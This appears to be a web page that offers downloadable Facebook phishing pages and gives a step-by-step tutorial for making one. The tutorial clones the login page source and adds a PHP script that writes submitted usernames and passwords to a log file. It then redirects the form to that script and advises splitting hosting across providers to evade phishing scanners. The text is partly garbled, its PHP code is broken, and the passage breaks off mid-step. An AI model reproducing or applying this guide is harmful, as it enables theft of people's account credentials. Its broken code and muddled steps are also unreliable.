Download Phishing Page Of Facebook

Facebook Hack Creating facebook phising page and How to hack facebook account using phising page So, you'll get a basic idea about how actually phishing attack works. LAST WORD: That's it, friends, this is the simple post for making phishing page for smartphone users.I hope you liked this post please share it with your friends too. I ' m here for you,before some days i write for phishing attack method and today i give you ready-made phishing pages for facebook. Now sit relax and download it from the below given link here i give you 3 version of facebook phishing page (Desktop,mobile,messenger). Step 1: Make a phishing facebook login page as android browser and host to web (Undetectable) First you need to download ‘‘ attachment file – Click here to download or Alternate download It contains 5 phishing page files including a folder. Open facebook login page in your browser. Press ctrl+U to find source code. Copy whole source code and create a PHP file (index.php) and paste it. Now, search for string methode='POST', it will give you two results first for login and second for register.

  • Version 1.1
  • Download 627
  • File Size 4kb
  • Create Date February 5, 2020
Download Phishing Page Of Facebook

Download the HTML Index of the Target Webpage

Facebook Phishing Page || To begin, you have to get the HTML index of the page. There are various ways to do this, there are also online templates for popular sites. In this tutorial, I am going to use the most basic method so that it is as knob-friendly as possible.

Navigate to Your Webpage

View the Source of the Website.

Depending on your browser, there may be different methods. Usually this is done by right clicking on the site and clicking 'View Source'. I did that on my browser and one windows should be similar to this.

On the right side of the box is the source of the website. Which leads to the next step.

Downloading and Saving the Source Code

To Creat Facebook Phishing Page || Select the box, and copy-paste everything in a txt document into the box. If you are not using Windows, use Notepad and a simple text editing program on Windows. (Do not use programs like Word or Page because it is really slow). After you do this, click 'Save As' or whatever option allows you to save that document. On a notepad it should look like this.

Change 'Save as type' to all files and change the encoding to Unicode.
After that, name the document 'index.html', apparently without a trace of speech.

congratulation! You have finished the first stage of the tutorial!

Creating a PHP File for Password Harvesting.

The PHP file is basically the tool that allows users to harvest passwords in this scenario. If you have some programming knowledge, there are many ways to make this PHP, but if you don't, just copy my exemplary PHP.

header ('Location:');
$handle = fopen('log.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, '

fwrite($handle, '


Similar to above, save the PHP file as 'all files' and 'post.php'. Change the encoding to Unicode and you should be ready to go!

Modify the Page HTML File to Incorporate Your PHP File in It.

Now, to get the passwords that users send, we have to include our PHP file.

Find the Password-Sending Method.

First of all, you need to see how the website works when the user submits the username-password.
For Facebook, all you have to do is Ctrl-F and type '= action' in the field.

Now, you need to replace everything in the part underlined with 'post.php', place the speech marks. (Just one set please).

Obviously, this method will be different for other websites. A good way to find this is by using the Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the method above.

Please note: You will need to change this later when you actually host the website.

Hosting the PHP File for Password Storing.

Now here is the juicy part, which makes your fake website online so that others can browse it.

You can use any of the free hosting services to host and store passwords. However, the hosting plan has to include something called 'FTP'. For this tutorial, I will use 000webhost.

Navigate to the FTP Server for Your Web Hosting Service.

For this step, I assume that you have created a website with your hosting service.

For 000webhost, you just click 'File Manager' and click 'Upload File'. Here is a picture of the FTP server for 000webhost.

Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial.

Upload Your PHP Files and Change Permission

As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn't allow you to upload to the root folder, just follow their particular instructions).

Now you need to change the permission to '777', which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one.

Now you can close the FTP server. Note down your web address!

Hosting the Actual Phishing Page

For this step, you will need to use the exact hosting provider that I use, otherwise you will get banned.

There is a reason why I don't use the same hosting provider for my actual page, and that is because most hosting providers will employ some kind of scanning to detect phishing pages. I can tried multiple hosting services in the past and all of them banned me within 30 mins of uploading the index file.

Configuring the post.php Forum

Now, before you host the website, remember the post.php/login form thing we configured above?

You need to find the login form thing again in your index.html and replace the 'post.php' with 'http://yourwebsiteforyourpostphpupload/post.php', assuming that you uploaded to the root folder. Remember to add http:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to, if it does then you have pasted the correct site. If it doesn't, then double check if you have uploaded your file to the correct directory.

Download Phishing Page Of Facebook Page

Hosting the Actual Page

Facebook Phishing Website

Navigate to You will see something similar to this: